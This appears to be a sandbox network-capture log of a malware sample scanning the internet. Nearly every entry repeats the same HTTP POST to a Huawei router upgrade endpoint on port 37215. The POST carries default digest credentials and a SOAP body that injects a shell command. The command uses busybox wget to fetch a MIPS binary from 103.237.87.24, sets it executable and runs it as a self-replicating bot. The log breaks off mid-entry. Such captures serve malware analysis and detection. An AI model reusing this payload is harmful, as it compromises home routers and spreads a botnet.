                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  219192.168.2.1333876157.239.199.2637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.076971054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  220192.168.2.1335166157.55.220.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.077012062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  221192.168.2.1335244157.122.145.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.077013969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  222192.168.2.1337828157.224.9.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.077038050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  223192.168.2.1337986157.78.75.15537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.077039003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  224192.168.2.1346182157.186.208.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.077038050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  225192.168.2.1358500178.81.228.837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.077038050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  226192.168.2.1337700102.214.5.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.077491045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  227192.168.2.1355914157.64.143.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.077625990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  228192.168.2.1349910157.232.22.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.077627897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 